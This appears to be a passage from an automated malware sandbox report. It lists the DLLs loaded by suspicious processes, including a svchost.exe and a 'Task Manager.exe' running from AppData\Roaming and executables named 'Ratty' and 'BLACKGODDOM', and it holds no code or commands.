                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.cmdSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: d3dcompiler_43.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: d3dx11_43.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
